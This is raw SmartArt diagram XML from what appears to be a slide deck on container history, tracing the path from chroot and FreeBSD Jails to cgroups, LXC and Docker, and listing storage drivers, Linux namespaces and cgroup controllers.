    <dgm:pt modelId="{4577C4B3-F053-4C73-875E-9A1BC2EC0A76}" type="pres">
      <dgm:prSet presAssocID="{2DADE0A4-AB94-423E-AD99-038AF1788658}" presName="spH" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{30D5E4A4-B873-461A-97CB-7ABF6C0D4A6B}" type="pres">
      <dgm:prSet presAssocID="{2DADE0A4-AB94-423E-AD99-038AF1788658}" presName="desTx" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="1" custScaleX="76569" custScaleY="50629">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{CB9666BC-417F-4BCB-9BD7-842435F6079D}" srcId="{DEBF44D1-446E-4DFA-802E-F215B1AF143C}" destId="{2DADE0A4-AB94-423E-AD99-038AF1788658}" srcOrd="0" destOrd="0" parTransId="{45E49FA6-ADD3-40F6-B33B-C450D5D40B62}" sibTransId="{A2C99C62-DBA2-4B4F-A26A-E5E5F2161890}"/>
    <dgm:cxn modelId="{249E1745-A78C-4A77-8EB4-A76AFE12957C}" type="presOf" srcId="{94A80054-292D-4A28-8DF2-AE3FD48CD90A}" destId="{30D5E4A4-B873-461A-97CB-7ABF6C0D4A6B}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/BracketList"/>
    <dgm:cxn modelId="{4B6FDF6D-2577-4159-984E-D1893254D298}" srcId="{2DADE0A4-AB94-423E-AD99-038AF1788658}" destId="{94A80054-292D-4A28-8DF2-AE3FD48CD90A}" srcOrd="0" destOrd="0" parTransId="{70B7D31F-BE66-48DA-BA22-805D9AA1A6BE}" sibTransId="{63D4AA77-B97D-4FAF-8C28-1B9C6158BBA1}"/>
    <dgm:cxn modelId="{446F583D-8CDC-4D39-832A-C6906A33311E}" type="presOf" srcId="{2DADE0A4-AB94-423E-AD99-038AF1788658}" destId="{78C6EF99-2B52-4825-8639-132F104CF217}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/BracketList"/>
    <dgm:cxn modelId="{90E1D599-4C38-49F8-96BA-22523C882B3D}" type="presOf" srcId="{DEBF44D1-446E-4DFA-802E-F215B1AF143C}" destId="{36D173CE-89DD-4DA6-9B2D-CECC94ECC3BF}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/BracketList"/>
    <dgm:cxn modelId="{3068D1E1-471B-4448-9DED-328DD8DD1EA2}" type="presParOf" srcId="{36D173CE-89DD-4DA6-9B2D-CECC94ECC3BF}" destId="{71C02EC8-ADED-4D58-B93F-7040ECBEB148}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/BracketList"/>
    <dgm:cxn modelId="{B6822861-7A5D-4FA1-81FB-4C7165919EEC}" type="presParOf" srcId="{71C02EC8-ADED-4D58-B93F-7040ECBEB148}" destId="{78C6EF99-2B52-4825-8639-132F104CF217}" srcOrd="0" destOrd="0" presId="urn:diagrams.loki3.com/BracketList"/>
    <dgm:cxn modelId="{B1465A74-BB7D-45D1-AA67-1BD4CD847E84}" type="presParOf" srcId="{71C02EC8-ADED-4D58-B93F-7040ECBEB148}" destId="{E8C26862-475C-4C2D-8675-2DD1C439E258}" srcOrd="1" destOrd="0" presId="urn:diagrams.loki3.com/BracketList"/>
    <dgm:cxn modelId="{7C6930CB-2B14-42DF-8BAA-AE02E5CBBBDB}" type="presParOf" srcId="{71C02EC8-ADED-4D58-B93F-7040ECBEB148}" destId="{4577C4B3-F053-4C73-875E-9A1BC2EC0A76}" srcOrd="2" destOrd="0" presId="urn:diagrams.loki3.com/BracketList"/>
    <dgm:cxn modelId="{A6D516FD-E552-4900-B77A-D3AFB1B895D1}" type="presParOf" srcId="{71C02EC8-ADED-4D58-B93F-7040ECBEB148}" destId="{30D5E4A4-B873-461A-97CB-7ABF6C0D4A6B}"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2AB52-E597-4475-AF26-3A789E4912DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-252975" y="252975"/>
          <a:ext cx="1686502" cy="118055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1979 </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Unix V7</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1" y="590276"/>
        <a:ext cx="1180551" cy="505951"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5A7AEF42-1964-4A31-AF8C-FED9DB0FD867}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4995162" y="-3814156"/>
          <a:ext cx="1096226" cy="87254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0" kern="1200" dirty="0" smtClean="0"/>
            <a:t>During the development of Unix V7 in 1979, the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>chroot</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t> system call was introduced, changing the root directory of a process and its children to a new location in the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>filesystem</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t>. This advance was the beginning process isolation: segregating file access for each process. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Chroot</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t> was added to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>BSD</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t> in 1982.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1180552" y="53967"/>
        <a:ext cx="8671935" cy="989200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{484E4F05-4378-4CFB-833C-0A289318C5DC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-252975" y="1746637"/>
          <a:ext cx="1686502" cy="118055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2000</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>FreeBSD Jails</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1" y="2083938"/>
        <a:ext cx="1180551" cy="505951"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{726EF919-F191-41D7-8951-5352E10D9F93}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4995162" y="-2320949"/>
          <a:ext cx="1096226" cy="87254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0" kern="1200" dirty="0" smtClean="0"/>
            <a:t>FreeBSD Jails allows administrators to partition a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>FreeBSD</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t> computer system into several independent, smaller systems – called “jails” – with the ability to assign an IP address for each system and configuration.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="171450" lvl="1" indent="-171450" algn="l" defTabSz="711200">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Similar Jail was introduced in Linux </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>VServer</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0" smtClean="0"/>
            <a:t> in 2001.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1180552" y="1547174"/>
        <a:ext cx="8671935" cy="989200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A9A2DFFD-B8BE-4216-8828-531C20BBBF50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-252975" y="3239845"/>
          <a:ext cx="1686502" cy="118055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2004</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Solaris Containers</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1" y="3577146"/>
        <a:ext cx="1180551" cy="505951"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B2DC1F14-12C5-4266-9861-5A07A24628ED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4995162" y="-827741"/>
          <a:ext cx="1096226" cy="87254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0" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Combines system resource controls and boundary separation provided by zones, which were able to leverage features like snapshots and cloning from ZFS.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1180552" y="3040382"/>
        <a:ext cx="8671935" cy="989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2AB52-E597-4475-AF26-3A789E4912DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-252975" y="253429"/>
          <a:ext cx="1686502" cy="118055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2006 </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Process Containers</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1" y="590730"/>
        <a:ext cx="1180551" cy="505951"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5A7AEF42-1964-4A31-AF8C-FED9DB0FD867}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4995162" y="-3814156"/>
          <a:ext cx="1096226" cy="87254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b="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t>It was designed for limiting, accounting and isolating resource usage (CPU, memory, disk I/O, network) of a collection of processes. It was renamed “Control Groups (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>cgroups</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t>)” a year later and eventually merged to Linux kernel 2.6.24.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1180552" y="53967"/>
        <a:ext cx="8671935" cy="989200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{484E4F05-4378-4CFB-833C-0A289318C5DC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-252975" y="1746637"/>
          <a:ext cx="1686502" cy="118055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2008</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Linux Containers</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1" y="2083938"/>
        <a:ext cx="1180551" cy="505951"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{726EF919-F191-41D7-8951-5352E10D9F93}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4995162" y="-2320949"/>
          <a:ext cx="1096226" cy="87254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b="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t>The most complete implementation of Linux container manager. It was implemented using </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>cgroups</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t> and Linux namespaces, and it works on a single Linux kernel without requiring any patches.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1180552" y="1547174"/>
        <a:ext cx="8671935" cy="989200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A9A2DFFD-B8BE-4216-8828-531C20BBBF50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-252975" y="3239845"/>
          <a:ext cx="1686502" cy="118055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2013</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Docker</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1" y="3577146"/>
        <a:ext cx="1180551" cy="505951"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B2DC1F14-12C5-4266-9861-5A07A24628ED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4995162" y="-827741"/>
          <a:ext cx="1096226" cy="87254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b="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Docker used LXC in its initial stages and later replaced that container manager with its own library, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>libcontainer</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" b="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t>. But there’s no doubt that Docker separated itself from the pack by offering an entire ecosystem for container management.  </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1180552" y="3040382"/>
        <a:ext cx="8671935" cy="989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CE6A75-3FF8-4194-99FE-9831B266366F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2138" y="0"/>
          <a:ext cx="2098659" cy="3655384"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="1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bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Storage</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2138" y="0"/>
        <a:ext cx="2098659" cy="1096615"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{12D643E0-AF48-4183-BB35-81B6A0C9602C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="212004" y="1096927"/>
          <a:ext cx="1678927" cy="718136"/>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OverlayFS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="233037" y="1117960"/>
        <a:ext cx="1636861" cy="676070"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B22F2000-CB74-453E-B358-5701BFC71E06}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="212004" y="1925546"/>
          <a:ext cx="1678927" cy="718136"/>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err="1" smtClean="0"/>
            <a:t>Aufs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="233037" y="1946579"/>
        <a:ext cx="1636861" cy="676070"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{842C65AE-1601-4DFE-91A4-DE6A3AA19EB9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="212004" y="2754165"/>
          <a:ext cx="1678927" cy="718136"/>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Device Manager</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="233037" y="2775198"/>
        <a:ext cx="1636861" cy="676070"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FBB82117-9837-4D37-BC7F-DB3F82D556BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2258197" y="0"/>
          <a:ext cx="2098659" cy="3655384"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="1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bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Namespaces</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2258197" y="0"/>
        <a:ext cx="2098659" cy="1096615"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7072083A-8581-4329-9DA0-477B82581EDE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2468063" y="1096793"/>
          <a:ext cx="1678927" cy="350947"/>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PID</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2478342" y="1107072"/>
        <a:ext cx="1658369" cy="330389"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{16C8F441-0E86-4BA4-8205-623AF8A01764}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2468063" y="1501732"/>
          <a:ext cx="1678927" cy="350947"/>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User</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2478342" y="1512011"/>
        <a:ext cx="1658369" cy="330389"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D9DE7586-6054-4E01-82D6-6CA481C824AF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2468063" y="1906671"/>
          <a:ext cx="1678927" cy="350947"/>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MNT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2478342" y="1916950"/>
        <a:ext cx="1658369" cy="330389"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4EEEF414-5E73-42B1-80EC-B52F54E5145E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2468063" y="2311610"/>
          <a:ext cx="1678927" cy="350947"/>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IPC</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2478342" y="2321889"/>
        <a:ext cx="1658369" cy="330389"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4A8EAC8B-62AB-4CCE-8A50-0E3B8EC18EA9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2468063" y="2716550"/>
          <a:ext cx="1678927" cy="350947"/>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UTS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2478342" y="2726829"/>
        <a:ext cx="1658369" cy="330389"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DCE4E765-3C65-4E4E-AB52-2A237FE0C3AC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2468063" y="3121489"/>
          <a:ext cx="1678927" cy="350947"/>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NET</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2478342" y="3131768"/>
        <a:ext cx="1658369" cy="330389"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2AE096B0-E6DB-4467-AFE8-90C18B3946CD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4514256" y="0"/>
          <a:ext cx="2098659" cy="3655384"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="1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bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>CGROUPS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4514256" y="0"/>
        <a:ext cx="2098659" cy="1096615"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EAF9D065-4A1A-487B-8034-89DC20147E9F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4724122" y="1096927"/>
          <a:ext cx="1678927" cy="718136"/>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CPU</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4745155" y="1117960"/>
        <a:ext cx="1636861" cy="676070"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DE26DBA6-60A8-4CCA-85C8-D71573485800}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4724122" y="1925546"/>
          <a:ext cx="1678927" cy="718136"/>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Memory</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4745155" y="1946579"/>
        <a:ext cx="1636861" cy="676070"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DDE998AB-26DA-4751-B5BE-A52201553888}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4724122" y="2754165"/>
          <a:ext cx="1678927" cy="718136"/>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Device</a:t>
